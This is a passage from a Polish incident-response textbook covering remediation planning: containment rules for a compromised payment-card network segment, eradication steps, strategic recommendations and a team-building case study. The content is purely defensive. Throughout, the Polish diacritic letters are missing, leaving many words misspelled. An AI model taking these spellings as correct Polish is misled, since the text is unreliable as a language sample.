powany. Opniona akcja naprawcza skada si z trzech etapw: wdroenia wstpnych rodkw
zaradczych, procesu likwidacji zagroenia i sformuowania zalece strategicznych. Zobaczmy,
jakie konkretne dziaania mona podj w ramach kadej z tych faz w odniesieniu do omawianego
przypadku.
Wstpne czynnoci zaradcze na tym etapie mona wdroy ponisze dziaania
naprawcze (zgoszone podczas burzy mzgw):
ukrycie wersji serwera sieciowego;
naprawa niebezpiecznego kodu;
implementacja hostowego systemu wykrywania wama (np. Tripwire do wykrywania
zmian w systemie plikw) w celu monitorowania zmian w systemie plikw;
monitorowanie dostpu do plikw w kluczowych systemach.
Jest te kilka innych moliwoci, ktre warto rozway, a ktre nie zostay zgoszone
podczas burzy mzgw, poniewa nie maj bezporedniego zwizku z omawianym
incydentem:
przekierowanie wszystkich danych z dziennika systemowego do systemu zarzdzania
informacjami i zdarzeniami bezpieczestwa informatycznego (SIEM);
instalacja brakujcych poprawek do wszystkich systemw operacyjnych;
usunicie niepotrzebnych programw ze wszystkich serwerw w strefie DMZ.
W wikszoci przypadkw wykonanie wymienionych czynnoci nie powinno da hakerowi
znaku, e zosta wykryty i jest prowadzone ledztwo. Kada czynno wykonywana w ramach
wstpnego procesu naprawczego moe wyglda jak zwyke dziaanie pracownikw z dziau
IT, a nie jak akcja podejmowana w odpowiedzi na poczynania hakera.
Proces likwidacji zagroenia oto lista czynnoci, ktre mona wykona w ramach
procesu eradykacji zagroenia.
1. Odczenie systemw ze strefy DMZ od internetu.
2. Zablokowanie pocze wychodzcych ze szkodliw domen (ftp.evilattacker.net)
przez przekierowywanie ich do czarnej dziury (ang. blackholing DNS).
3. Przebudowa serwera, na ktrym doszo do wamania:
a) usunicie szkodliwych plikw z systemu (punkt ten jest realizowany przez
przebudow serwera);
b) uruchomienie serwera Apache w rodowisku ograniczonym.
4. Wyczenie moliwoci zdalnego logowania si na konto uytkownika root.
5. Ustawienie silnych hase do wszystkich kont uytkownikw:
a) zmiana hase do kont uytkownikw root i Apache;
b) ustawienie innego hasa do kadego konta w systemie;
c) odebranie uytkownikowi Apache uprawnie uytkownika root;
d) uniemoliwienie uytkownikowi Apache tworzenia plikw w okrelonych
katalogach;
e) wdroenie zapory sieciowej lub innego systemu wykrywania wama ustawionego
na wykrywanie szkodliwej aktywnoci zwizanej z dziaaniem aplikacji sieciowych;
f) weryfikacja skutecznoci wszystkich dziaa podjtych w ramach likwidacji zagroenia.
Ta lista take zawiera pozycje, ktrych nie zgoszono w czasie burzy mzgw. Powodem
jest to, e niektre czynnoci zwizane z procesem likwidacji zagroenia s niezbdne
do skutecznej naprawy, ale nie wi si bezporednio z rozpoznan aktywnoci hakera.
Przykadem jest pierwsza z wymienionych czynnoci, czyli odczenie systemw ze strefy
DMZ od internetu. Jest to konieczne, aby uniemoliwi hakerowi przeszkadzanie
w przeprowadzaniu procesu eradykacji. Jednak czynno ta nie jest bezporednio zwizana
z ktrymkolwiek etapem cyklu ataku ani elementem tabeli planowania procesu naprawy.
Zwr te uwag na kolejno wykonywania poszczeglnych czynnoci. Jest ona taka,
by uniemoliwi hakerowi czenie si ze rodowiskiem i korzystanie ze zdobytego konta
uytkownika (na wypadek gdyby przeoczono jak drog dostpu do rodowiska) oraz
by umoliwi wprowadzenie wzmocnionych zabezpiecze (np. przez przebudow serwera
Apache i uruchomienie go w rodowisku ograniczonym).
Dziaania strategiczne poniej znajduje si lista czynnoci z kategorii zalece
strategicznych:
przeprowadzenie dokadnej inspekcji kodu;
implementacja list ACL w celu ograniczenia moliwoci systemw w zakresie komunikacji
midzy sob z wyjtkiem wybranych portw uywanych do prowadzenia dziaalnoci;
implementacja systemu wykrywania wama nastawionego na monitorowanie midzy
systemami ruchu niemajcego zwizku z prowadzon dziaalnoci.
Inne zalecenia strategiczne, ktre warto rozway, mimo e nie zostay zaproponowane
podczas burzy mzgw, poniewa nie s bezporednio zwizane z omawianym incydentem, to:
implementacja systemu zarzdzania informacjami i zdarzeniami bezpieczestwa
informatycznego (SIEM) w celu centralnego przechowywania danych dziennikw
w strefie DMZ;
monitorowanie bezpieczestwa strefy DMZ za pomoc zewntrznej usugi;
wyczenie moliwoci zdalnego zarzdzania przez internet systemami nalecymi do strefy
DMZ wszystkim uytkownikom oprcz tych, ktrzy stosuj uwierzytelniania wieloskadnikowe.
W nastpnym rozdziale opisujemy konkretne scenariusze i przedstawiamy wicej szczegw
podczas analizy przypadkw przeprowadzania procesu naprawczego. Jednak wczeniej chcielibymy
powici kilka sw typowym problemom, ktre mog przyczyni si do poraki procesu.
TYPOWE BDY BDCE PRZYCZYN

NIEPOWODZENIA PROCESU NAPRAWCZEGO
Z naszego dowiadczenia wynika, e podczas procesu naprawczego organizacje popeniaj pewne
typowe bdy, ktre przyczyniaj si do cakowitego lub czciowego fiaska operacji. Oto najczciej
spotykane puapki, na ktre musisz uwaa:
brak lidera,
brak wsparcia ze strony kierownictwa,
niedostateczne planowanie,
ustalenie zbyt ambitnego planu naprawczego,
wykonywanie dziaa w nieodpowiednim czasie.
Kwestie braku liderw incydentu i procesu naprawczego oraz wsparcia ze strony kierownictwa,
a take niedostatecznego planowania i wykonywania czynnoci w nieodpowiednim czasie
omwilimy wczeniej w tym rozdziale. Nie zajmowalimy si natomiast do tej pory skutkami
sporzdzenia zbyt ambitnego planu naprawczego. Niektre organizacje wykorzystuj t okazj do
kompletnej przebudowy mechanizmw zabezpiecze. Robi tak z reguy z tego powodu, e zesp
ds. zabezpiecze nagle staje si obiektem zainteresowa kierownictwa oraz otrzymuje wsparcie
i rodki. Przez to czsto zapomina si o aktualnym problemie (trwajcym incydencie) i rozpoczyna
planowanie dugofalowych dziaa. Zesp naprawczy nie moe pozwoli na wcignicie w t
puapk i musi cay czas skupia si przede wszystkim na rozwizywaniu biecego problemu.
Zalecenie, aby lekceway planowanie wzmocnionych zabezpiecze na przyszo, moe
brzmie dla dowiadczonych specjalistw niedorzecznie. Przecie ich zadaniem jest ochrona
niezliczonych systemw i aplikacji, a hakerowi wystarczy znalezienie tylko jednej luki w jednej
aplikacji lub w jednym systemie, aby obej wszystkie zabezpieczenia. Dlatego skorzystanie
z dodatkowego wsparcia i kucie elaza pki gorce wydaje si kuszc moliwoci. Jednak
z dowiadczenia wiemy, e przebudowa zabezpiecze w takim momencie nigdy si nie udaje,
poniewa wymaga zbyt duo dodatkowej pracy. Poraka taka zazwyczaj ma wpyw na cae ledztwo
i przebieg procesu naprawczego, poniewa zasoby s wykorzystywane do czego innego.
I CO Z TEGO
Proces naprawczy moe by bardzo skomplikowany i trudny do przeprowadzenia. Koordynacja
prac wielu zespow, okrelanie skutkw wprowadzenia zmian, dopilnowanie kwestii prawnych,
radzenie sobie w nagych przypadkach, stres zwizany ze strachem, e si co przeoczyo, oraz
uczestniczenie w niezliczonych spotkaniach jest wielkim testem cierpliwoci i przyczyn
cakowitego wyczerpania pracownikw. Dlatego tak wane jest dokadne zaplanowanie procesu,
skupienie si na zadaniu, zwracanie uwagi na szczegy oraz skuteczne koordynowanie dziaa.
Proces ten skada si z omiu etapw, ktre wymienilimy na pocztku rozdziau. Oto one.
Budowa zespou naprawczego.
Okrelenie punktw czasowych.
Okrelenie i wdroenie podstawowych czynnoci naprawczych.
Okrelenie i wdroenie rodkw majcych ograniczy zasig incydentu.
Opracowanie planu likwidacji zagroenia.
Okrelenie czasu likwidacji zagroenia i wdraanie planu dziaania.
Opracowanie zalece strategicznych.
Opis zdobytego dowiadczenia.
PYTANIA
1. Wymie przynajmniej pi czynnikw o kluczowym znaczeniu dla powodzenia akcji naprawczej.
2. Wymie przynajmniej trzy z piciu cech, jakie powinien posiada silny lider procesu naprawczego.
3. Czy w skad zespou naprawczego powinny wchodzi osoby z zespou ledczego? Dlaczego?
4. Podaj przynajmniej pi przykadw osb, ktre powinny wchodzi w skad zespou
naprawczego (wcznie z pracownikami pomocniczymi).
5. Zdefiniuj wstpne dziaania zaradcze. Zdefiniuj dziaania ograniczajce zasig incydentu.
Wymie kilka rnic midzy tymi dwiema kategoriami dziaa.
6. Wymie kilka najczstszych powodw niepowodzenia procesw likwidacji zagroenia.
7. Wyjanij pojcie redniego czasu do naprawy. Czy jest to przydatne pojcie?
8. Podaj przykad sytuacji, w ktrej lepszym rozwizaniem byoby zastosowanie czonej
metody reakcji ni podejcia natychmiastowego lub opnionego.
9. Wybierz wie notatk ujawniajc opinii publicznej wamanie do jakiego systemu
i stwrz plan ograniczenia incydentu na podstawie posiadanych informacji. Jakie dziaania
wykonaby w ramach procesu likwidacji zagroenia, ktrych nie przeprowadziby w trakcie
wdraania planu ograniczania zagroenia? Wyjanij swoje wybory.
10. Stwrz kompletny plan naprawczy z uwzgldnieniem akcji wdraania wstpnych czynnoci
naprawczych i ograniczania zasigu incydentu, planu eradykacji zagroenia oraz zalece
strategicznych dla jednego lub dwch przypadkw opisanych w rozdziale 1.
ROZDZIA 18.
Studium przypadku
procesu naprawczego
W
rozdziale tym bdziemy opiera si na podstawowych pojciach zwizanych z procesem
naprawczym, opisanych w rozdziale 17. Proces naprawy systemu po incydencie nie zawsze
jest prosty, a na jego przebieg maj wpyw zarwno czynniki techniczne, jak i nietechniczne.
Do najwaniejszych czynnikw wpywajcych na czas i powodzenie operacji zalicza si m.in. to, czy
dane aplikacje s wane dla dziaalnoci firmy, a take moliwoci dziaania, koszty oraz dostpno
pracownikw. Uwarunkowania te czasami zmuszaj zesp naprawczy do wdraania nieoptymalnych
rozwiza, poniewa tylko na to mona sobie pozwoli w danej sytuacji.
W rozdziale tym opisujemy krok po kroku proces tworzenia planu naprawczego dla pierwszego
przypadku opisanego w rozdziale 1. Wyjaniamy, dlaczego wykonuje si niektre czynnoci, oraz
przedstawiamy realia, w jakich musz pracowa zespoy naprawcze. Ponadto opisujemy te skutki
dziaa naprawczych. Z niektrymi opisanymi metodami dziaania moesz si nie zgadza nie
dziwi nas to. Mowa jest o prawdziwym zdarzeniu, ktre miao miejsce w zoonym rodowisku, wic
nie zawsze dao si zastosowa idealne rozwizania. Ponadto na kocu rozdziau zamiecilimy
te zadanie polegajce na opracowaniu wasnego planu naprawczego dla drugiego z opisanych
przypadkw, wic bdziesz mie okazj wykaza si swoimi umiejtnociami.
Uwaga Nie ma jednej prawidowej metody przeprowadzania akcji naprawczej. O sukcesie mona mwi, gdy:
haker zostanie wydalony ze rodowiska,
zostanie przywrcona normalna dziaalno firmy,
rodowisko zostanie zabezpieczone lepiej ni byo przed incydentem,
kolejne incydenty s szybko wykrywane i likwidowane.
PLAN NAPRAWCZY DLA PIERWSZEGO

PRZYPADKU POKA PIENIDZE
Postanowilimy podzieli nasze studium przypadku na pi czci. Zaczniemy od skompletowania
zespou i okrelenia ram czasowych. Nastpnie przeprowadzimy proces ograniczania zasigu
incydentu, wprowadzimy wstpne rodki zaradcze, usuniemy hakera ze rodowiska i w kocu
omwimy strategiczne zalecenia, jak poprawi poziom bezpieczestwa. Tematy poszczeglnych
czci odpowiadaj z grubsza oglnym etapom procesu naprawczego, ktre opisalimy w poprzednim
rozdziale. W studium tym nie opisujemy zdobytego dowiadczenia. Kada organizacja wyciga
wasne wnioski, ktre zale od jej sytuacji, czonkw zespou oraz stanu zabezpiecze.
Uwaga Dalej w tym rozdziale czsto bdziemy odnosi si do tego, co napisalimy w rozdziale 1., dlatego
dobrym pomysem moe by ponowne przeczytanie opisu pierwszego przypadku i podrozdziau
o cyklu ataku.
ROZDZIA 18. STUDIUM PRZYPADKU PROCESU NAPRAWCZEGO 569
Wybr czonkw zespou

Na lidera incydentu wybrano starszego wiceprezesa o imieniu Jan, ktry kierowa grup nadzorujc
operacje informatyczne. Wybr Jana by podyktowany tym, e jego zesp mia odpowiedni wiedz
techniczn i cile wsppracowa z dziaem informatycznym. Dziki temu mia on bliskie powizania
z ludmi z tego dziau i dobrze zna zagadnienia IT. Istniao niewielkie ryzyko, e Jan sprbuje ukry
bdy w mechanizmach zabezpiecze i inne problemy. Ostatecznie jednak Jan by jedn z najwaniejszych
osb w organizacji i cieszy si duym szacunkiem za trafno podejmowanych decyzji. Wszystko
to przemawiao za tym, e Jan bdzie dobrym liderem incydentu. Jako lider Jan wybra do swojego
zespou po jednym specjalicie z nastpujcych siedmiu dziedzin.
Inynieria systemw specjalista ten wiedzia, jak przebiega budowa, wdraanie,
konfigurowanie i serwisowanie takich systemw jak serwery, stacje robocze, laptopy
i urzdzenia mobilne wykorzystywane w ograniczonym rodowisku finansowym. Jego
funkcj byo doradzanie zespoowi naprawczemu w kwestiach zwizanych z prowadzeniem
dziaa w systemach komputerowych w taki sposb, aby spowodowa jak najmniejsze
szkody dla dziaalnoci firmy.
Inynieria aplikacji pracownik z tego dziau zna rne aplikacje dziaajce w strefie
DMZ, rodowisku korporacyjnym i ograniczonym rodowisku finansowym. W zespole
naprawczym jego zadanie polegao na pilnowaniu, by podejmowane przez zesp dziaania
zwizane z aplikacjami nie spowodoway utrudnie w dziaaniu przedsibiorstwa.
Inynieria sieciowa specjalista ten zna architektur sieci i wiedzia, jak s
skonfigurowane sieciowe urzdzenia zabezpieczajce. Jego zadaniem byo dopilnowanie
prawidowego zaplanowania i przeprowadzenia akcji naprawczych dotyczcych sieci.
Zesp ledczy ten czonek zna wszystkie aspekty zagroenia, wic wnis do prac
zespou spojrzenie z perspektywy hakera. Jego zadaniem byo dopilnowanie, aby plan
naprawczy obejmowa wszystkie fazy ataku zaobserwowane w incydencie oraz by wszystkie
podejmowane czynnoci rzeczywicie likwidoway zagroenie.
Public relations osoba z tego dziau odpowiedzialna bya za poprawianie nadszarpnitego
wizerunku firmy po przedostaniu si do opinii publicznej negatywnych wiadomoci.
Zadaniem tego czonka zespou byo przygotowywanie materiaw do publikacji,
odpowiadanie na pytania mediw oraz minimalizowanie szkd w porozumieniu z dyrekcj.
Operacje biznesowe wybrany specjalista to meneder z wieloletnim staem, doskonale
znajcy podstawowe wewntrzne mechanizmy dziaania organizacji, ktra pada ofiar
ataku. Do jego zada naleao objanianie dyrektorom dziaw skutkw wprowadzenia
rnych rodkw naprawczych oraz uwiadamianie czonkom zespou naprawczego, jakie
skutki dla dziaalnoci biznesowej firmy bd miay podejmowane przez nich dziaania.
Dzia prawny osoba z tego dziau bya zaangaowana w prace od samego pocztku, na
wypadek gdyby organizacja zostaa pozwana do sdu z powodu prowadzonych przez siebie
dziaa. Co par dni prawnikowi przedstawiano szczegowe sprawozdanie, aby wiedzia,
co si dzieje. Okazao si to dobrym posuniciem, poniewa w pewnym momencie
informacja o incydencie wycieka do mediw, co pocigno za sob pozwy od podmiotw,
ktre poniosy straty z powodu kradziey ich danych.
Po skompletowaniu zespou Jan zdecydowa, e jego liderem bdzie administrator sieci

o imieniu Andrzej. Wybr ten by podyktowany tym, e Andrzej mia najwiksz wiedz
techniczn z wszystkich, umia pracowa zespoowo, a w firmie pracowa duej ni dziesi lat.
Ponadto cieszy si sympati i szacunkiem wszystkich czonkw zespou zarwno tych z dziaw
technicznych, jak i pozostaych.
Czas prowadzenia dziaa naprawczych

Pierwszym zadaniem Andrzeja byo okrelenie czasu prowadzenia dziaa naprawczych. Prac
zacz od zasignicia informacji w zespole ledczym na temat dotychczasowej aktywnoci hakera.
Dowiedzia si, e intruz zainstalowa w rodowisku kilka tylnych drzwi, aby zapewni sobie
nieprzerwany dostp do systemw, i tunelowa przez nie ruch RDP. Ponadto okazao si, e haker
uzyska dostp do ograniczonego rodowiska finansowego przez serwer wstpny oraz czy si
z tego rodowiska z internetem przez rodowisko korporacyjne. Nastpnie Andrzej spotka si
z interesariuszami i najwaniejszymi dyrektorami, aby dowiedzie si wicej na temat postpu
poczynionego przez zesp ledczy, zobowiza firmy oraz wymogw prawnych, jakie naleao
speni. Na zebraniu tym podjto decyzj, aby natychmiast wdroy plan ograniczania zagroenia
majcy na celu odcicie hakerowi dostpu do ograniczonego rodowiska finansowego. Decydenci
wiedzieli, e planowane dziaania mog przeszkodzi w prowadzeniu dziaalnoci biznesowej,
ale przeprowadzenie akcji byo konieczne, by zatrzyma dalszy wyciek danych kart kredytowych.
Postanowiono wic wprowadzi w ycie plan ograniczania zagroenia, a nastpnie powoli przywraca
normalne dziaanie organizacji w miar zdobywania dodatkowych informacji o zakresie incydentu.
Jest to przykad czonej metody naprawczej. Zesp naprawczy przeprowadzi natychmiastow
operacj ograniczajc incydent w rodowisku finansowym, ale z dalszymi dziaaniami w pozostaej
czci rodowiska troch poczeka.
Ograniczanie zasigu incydentu

Gdy zesp naprawczy okreli czas przeprowadzenia akcji naprawczej, mg przystpi do
planowania akcji ograniczajcej zasig incydentu. W tym przypadku haker krad dane kart
kredytowych z ograniczonego rodowiska finansowego, wic najwaniejsze byo ukrcenie tego
procederu. Aby skutecznie dziaa, zesp potrzebowa wicej informacji o sposobach dostpu
do rodowiska finansowego. Andrzej wraz z reszt zespou przeprowadzi przesuchania, zbada
cieki przepywu danych, przeanalizowa dokumentacj sieci oraz rcznie przejrza listy ACL
w dwch kluczowych przecznikach i ustawienia parowania zapory sieciowej.
Ostrzeenie Zawsze naley sprawdza wszelkie otrzymywane informacje techniczne. Organizacje nie zawsze
dobrze rozumiej, w jaki sposb ruch sieciowy przepywa przez ich rodowiska oraz jak dziaaj
listy ACL. Dlatego wanie zesp naprawczy nie poprzesta na rozmowach z pracownikami i przejrzeniu
dokumentacji, tylko samodzielnie przeanalizowa te listy.
Poniej znajduje si zestawienie zdobytych przez zesp naprawczy informacji na temat drg
wejciowych i wyjciowych z ograniczonego rodowiska finansowego.
Dostp ze rodowiska korporacyjnego do ograniczonego rodowiska finansowego
by moliwy tylko przez serwer wstpny JMPSRV.
Dostp ze rodowiska ograniczonego do rodowiska korporacyjnego by zabroniony.
Do rodowiska ograniczonego nie byy podczone adne bezprzewodowe punkty dostpowe.
Wybrane systemy komunikoway si z centrum autoryzacyjnym przez poczenie wirtualne.
Dostp z centrum autoryzacyjnego do ograniczonego rodowiska finansowego
przez poczenie wirtualne by zabroniony.
W strefach DMZ znajdoway si rne aplikacje sieciowe majce poczenie
ze rodowiskiem ograniczonym poprzez bazy danych.
Ruch wychodzcy ze rodowiska ograniczonego do internetu by zablokowany.
Analiza list ACL ujawnia, e ruch sieciowy ze rodowiska ograniczonego do rodowiska
korporacyjnego nie by zablokowany. Kto kiedy doda tymczasow regu przepuszczajc cay ruch
i ju jej nie usun. Wprawdzie haker nie wykorzysta tego bdu, ale jest to dobry przykad dowodzcy,
e zawsze warto rcznie przejrze ustawienia konfiguracyjne. Ponadto zesp dowiedzia si, e
centrum autoryzacyjne ma nieograniczony dostp do ograniczonego rodowiska finansowego
przez poczenie wirtualne. Nie byo adnej zapory chronicej poczenia z centrum, cho
w dokumentacji pozycja taka figurowaa. Poniszy schemat przedstawia struktur
ograniczonego rodowiska finansowego i moliwe cieki przepywu danych.
Uwaga Bardzo wane jest regularne przeprowadzanie testw penetracyjnych kluczowych systemw,
poniewa w ten sposb mona wykry usterki konfiguracyjne oraz zapomniane tymczasowe
reguy i inne ustawienia. Ponadto za pomoc testw penetracyjnych mona zweryfikowa
zgodno wdroenia projektu z planem. Dalej w tym rozdziale piszemy, e przeprowadzanie
testw penetracyjnych jest podstawowym zaleceniem strategicznym dla wielu organizacji.
Na podstawie zdobytych informacji Andrzej we wsppracy z caym zespoem opracowa

natychmiastowy plan ograniczenia zasigu incydentu. (Kursyw napisalimy dodatkowe uwagi
objaniajce kade z zalece nie nale one do planu).
Implementacja reguy blokujcej wszelki ruch ze rodowiska ograniczonego do rodowiska
korporacyjnego. Regua ta powinna zosta wdroona na stae.
Nie ma powodu, aby przepuszcza jakikolwiek ruch ze rodowiska ograniczonego do
korporacyjnego, wic naley go cakowicie zablokowa. Haker mgby napisa program
czcy si ze rodowiska ograniczonego wprost z usug wymiany poczty zamiast korzysta
z serwera wstpnego.
Na serwerze wstpnym naley blokowa cay ruch ze rodowiska korporacyjnego
do rodowiska ograniczonego. Ta regua powinna by tymczasowa.
Ta regua zapory sieciowej powinna odci hakerowi wszelki dostp do ograniczonego
rodowiska finansowego ze rodowiska korporacyjnego. Musi to by ustawienie tymczasowe,
poniewa administratorzy systemw potrzebuj dostpu do ograniczonego rodowiska
finansowego przez serwer wstpny w celu przeprowadzania prac serwisowych
i administracyjnych.
Zablokowanie caego ruchu pochodzcego z centrum autoryzacyjnego w przeczniku
zarzdzajcym ruchem do i z tego centrum. Regu t naley zastosowa na stae.
Nie ma powodu, by przepuszcza ruch sieciowy z centrum autoryzacyjnego do rodowiska
ograniczonego, wic zabezpieczenie to wdroono na stae. Nie trzeba byo implementowa
zapory sieciowej dla tego cza, poniewa nie trzeba byo dogbnie nadzorowa pakietw.
Wystarczyo zastosowanie zwykej reguy deny w przeczniku.
Zablokowanie wszelkiego ruchu sieciowego ze stref DMZ do rodowiska ograniczonego
i odwrotnie, z wyjtkiem pocze z baz danych potrzebnych do prowadzenia dziaalnoci
biznesowej. T regu naley wdroy na stae.
Aby akcja ograniczania zasigu incydentu bya skuteczna, naley znacznie zawzi wszelkie
moliwoci dostpu do ograniczonego rodowiska finansowego. Oczywicie trzeba uwzgldni
pewne potrzeby biznesowe, takie jak np. poczenia z baz danych zawierajc dane
wykorzystywane przez aplikacje, z ktrych korzystaj uytkownicy. Akcja ta pozwolia jeszcze
bardziej ograniczy zasig incydentu. Regu t zastosowano na stae, poniewa celem strefy
DMZ jest ochrona rodowisk wewntrznych w przypadku, gdy dojdzie do zamania
zabezpiecze jednego z systemw w tej strefie.
Implementacja segmentu sieci VLAN w ograniczonym rodowisku finansowym, aby

przenie do kwarantanny wszystkie serwery baz danych komunikujce si z systemami
ze strefy DMZ. Jest to regua tymczasowa.
Segmentacja serwerw baz danych utrzymujcych poczenie z innymi serwerami baz danych
w strefie DMZ bya potrzebna do tego, by utrzyma integralno ograniczonego rodowiska
finansowego. Administratorzy systemw rcznie zaimportowali wszystkie dane potrzebne
bazom danych na czas trwania reakcji na incydent. Cho rodek ten znacznie zwiksza
segmentacj (a wic i bezpieczestwo) ograniczonego rodowiska finansowego, kwestie
biznesowe uniemoliwiaj zachowanie go na stae. Pniej wdroono inne rodki
zabezpieczajce poczenia z baz danych.
Zablokowanie wszelkich pocze midzy rodowiskiem ograniczonym i centrum
autoryzacyjnym. W czasie incydentu dane bd ustawiane w kolejce i przesyane rcznie.
Jest to regua tymczasowa.
Cho rodek ten powodowa pewien narzut, wszyscy czonkowie zespou uznali, e jest to
akceptowalne. Administratorzy sieci tymczasowo przepuszczali ruch, aby umoliwi rczne
uruchamianie transmisji danych, co miao miejsce raz dziennie. Regua ta niesie niewielkie
ryzyko i mona j atwo usun po zakoczeniu procesu eradykacji.
Poniszy rysunek przedstawia schemat ograniczonego rodowiska finansowego po przeprowadzeniu
czynnoci przewidzianych w planie ograniczania zagroenia. Zwr uwag na brak cieek przepywu
danych do i ze rodowiska.
Pewnie zauwaye, e w planie ograniczania zagroenia brakuje szczegw na temat sposobu

przeprowadzenia poszczeglnych akcji. Przykadowo jedn z czynnoci byo zaimplementowanie
reguy blokujcej wszelki ruch ze rodowiska korporacyjnego do rodowiska ograniczonego.
Jednak nie wskazano, w ktrych urzdzeniach regua ta ma zosta zastosowana ani jej miejsca
na licie ACL. W kompletnym planie te wane informacje znajduj si w osobnym dokumencie
zawierajcym szczegowy opis kadej czynnoci. Zrezygnowalimy z podawania tych informacji
dla czytelnoci, ale prawdziwy plan powinien skada si z oglnego zestawienia zalece i osobnego
dokumentu ze szczegowym opisem sposobu ich wdroenia. Oglne zestawienie mona przedstawi
kierownictwu, aby wiedziao, co ma zosta zrobione, oraz wykorzysta do odhaczania kolejno
wykonywanych czynnoci.
Ponadto warto zauway, e kady punkt planu opisuje konkretn czynno. W planie nie ma
miejsca na dywagacje i niepewne elementy. Zesp naprawczy powinien dokadnie omwi
wszystkie planowane dziaania, tak aby podczas ich realizacji nie byo ju adnych wtpliwoci.
Koniecznie naley wyranie oznaczy, ktre zalecenia maj charakter tymczasowy, a ktre stay.
Czasami plan ograniczania zagroenia moe opisywa wycznie dziaania tymczasowe, ale nie jest
to uniwersaln regu. W omawianym przypadku np. plan zawiera zarwno tymczasowe, jak i trwae
rozwizania, ktre poprawiy bezpieczestwo organizacji, nie wywierajc negatywnego wpywu
na jej dziaanie.
Wdroenie gotowego planu zajo zespoowi Andrzeja mniej ni dwadziecia cztery godziny.
Oznacza to, e od momentu wykrycia do ograniczenia zasigu incydentu mino tylko pi dni.
Moe si wydawa, e to duo czasu, ale pamitaj, e cakowite oczyszczenie rodowiska z wszelkich
ladw pozostawionych przez hakera trwao a dwa miesice. Po przeprowadzeniu tego wstpnego
procesu haker nie mia ju moliwoci wykradania danych kart kredytowych, co uchronio
organizacj przed wielkimi stratami finansowymi.
Pewnie zastanawiasz si, dlaczego zesp naprawczy nie mg wdroy swojego planu
ograniczajcego w caym rodowisku, tylko poprzesta na ograniczonym rodowisku finansowym.
Wikszo instytucji finansowych ma wdroone dodatkowe zabezpieczenia dla swoich aplikacji
i systemw. Jednym z najczciej stosowanych rozwiza jest wanie umieszczanie tych systemw
w segmencie sieci o ograniczonych moliwociach dostpu. Co takiego zrobiono te w organizacji
opisanej w naszym studium przypadku. Natychmiastowe plany ograniczajce incydent s
najskuteczniejsze, gdy zesp naprawczy zna wszystkie moliwe cieki przepywu danych do i z segmentu
sieci, na ktrym ma skupi swoj uwag. Oznacza to, e wdraanie planw ograniczajcych incydent
w posegmentowanych rodowiskach jest znacznie atwiejsze ni w duych rodowiskach korporacyjnych.
Gdy rozpoznane zostan wszystkie metody dostpu do rodowiska posegmentowanego, naley je
wszystkie zablokowa bez wzgldu na to, jak bardzo s bezpieczne. Krtko mwic, o wiele atwiej
skutecznie wdroy plan ograniczania zagroenia w jednym segmencie rodowiska.
Wstpna akcja naprawcza

Po wykonaniu planu ograniczania zagroenia zesp naprawczy przystpi do planowania wstpnej
akcji naprawczej, ktrej celem byo zwikszenie bezpieczestwa rodowiska jeszcze w trakcie
trwania ledztwa. Pewnie zastanawiasz si, po co to w ogle robi, skoro ju i tak zosta wdroony
plan ograniczania zagroenia. S po temu dwa powody. Po pierwsze, chodzi o zdobycie wikszej
iloci informacji, ktre bd potrzebne zarwno podczas aktualnego ledztwa, jak i w przyszoci.
Po drugie, zesp ledczy jeszcze nie okreli dokadnie zasigu zagroenia, wic zesp naprawczy
ma troch czasu, zanim skoncentruje si na procesie eradykacji.
Uwaga Cho incydenty bezpieczestwa komputerowego to bardzo przykre zdarzenia dla kadej
organizacji, jednak stanowi te okazj do zastosowania wielu ulepsze. Wprawdzie zesp
naprawczy powinien skupi si na trwajcym incydencie, ale kad woln chwil musi powica
na opracowywanie zalece zwikszajcych poziom bezpieczestwa organizacji w duszej
perspektywie. Dyrektorzy zazwyczaj patrz przychylniej na wszelkie propozycje dotyczce
zabezpiecze wanie w czasie trwania incydentw i bezporednio po ich zakoczeniu. Jednak,
mimo e incydent jest te okazj do zdobycia rodkw na rne inicjatywy, zesp naprawczy
nie powinien pozwala sobie na rozproszenie uwagi.
Nasz zesp naprawczy przedstawi osiem zalece majcych zwikszy poziom bezpieczestwa
rodowiska i ujawni wicej szczegw dotyczcych dziaalnoci hakera. Zostay one wymienione
w poniszej licie w kolejnoci od najwaniejszego.
Wczenie rejestracji legalnych pocze we wszystkich zaporach sieciowych.
Wczenie alarmw wykrycia znanego szkodliwego ruchu.
Czsto popenianym bdem w konfiguracji zapory sieciowej jest rejestrowanie tylko
niedozwolonego ruchu. Jednak w czasie incydentu monitorowanie ruchu przepuszczonego
przez zapor jest waniejsze od wychwytywania zablokowanych transferw. Dziki
zastosowaniu si do tej wskazwki przez organizacj zesp ledczy otrzyma moliwo
analizowania aktywnoci hakera w sieci.
Nakazanie zmiany kont wszystkim uytkownikom, ktrych konta zostay zdobyte
przez hakera.
Wdroenie tego zalecenia umoliwi ledczym identyfikacj potencjalnej aktywnoci hakera.
Jeli prawowici waciciele kont przestan korzysta z tych kont, to wszelka zwizana z nimi
aktywno bdzie prawdopodobnie oznaczaa dziaania hakera. Napisalimy prawdopodobnie,
poniewa uytkownicy czasami przez pomyk wracaj do swoich starych kont. Naley te
poinstruowa uytkownikw, aby do nowych kont nie uywali starych hase.
Wczenie automatycznego powiadamiania o przypadkach uycia kont zdobytych przez
hakera, wcznie z lokalnym kontem administratora i administratora domeny.
Zesp naprawczy skierowa dzienniki zabezpiecze systemu Windows z kontrolerw domen
usugi Active Directory i pliki /var/log.auth.log z kluczowych linuksowych systemw, na ktrych
doszo do wamania, do systemu zarzdzania informacjami i zdarzeniami bezpieczestwa
informatycznego SIEM. Jak to zwykle bywa w duych przedsibiorstwach, nie wszystkie
kluczowe systemy przekazyway swoje dzienniki do systemu SIEM. Zesp musia rozwiza
ten problem przed wdroeniem kompletnego rozwizania alarmujcego o aktywnoci hakera.
Tymczasowa implementacja dwuskadnikowego uwierzytelniania przy uyciu certyfikatw

maszynowych na serwerze JMPSRV ze rodowiska korporacyjnego.
Zabezpieczenie to uniemoliwi hakerowi dostp do rodowiska ograniczonego przy uyciu
tylko nazwy uytkownika i hasa. Uwierzytelnianie dwuskadnikowe utrudnia dostp do
systemu, poniewa zmusza do rozpracowania tego mechanizmu lub jakiej innej usugi
w systemie, bo podstawowa metoda polegajca na wykorzystaniu zwykych danych
powiadczajcych ju nie dziaa. Cho maszynowe certyfikaty nie s uwaane za
najbezpieczniejszy rodzaj uwierzytelniania dwuskadnikowego (poniewa mona je ukra),
to jednak s znacznie bezpieczniejsze od uwierzytelniania jednoskadnikowego. W pniejszym
czasie zesp naprawczy w zaleceniach strategicznych zawar punkt dotyczcy uywania
fizycznych tokenw lub wiadomoci SMS jako drugiego skadnika uwierzytelniania.
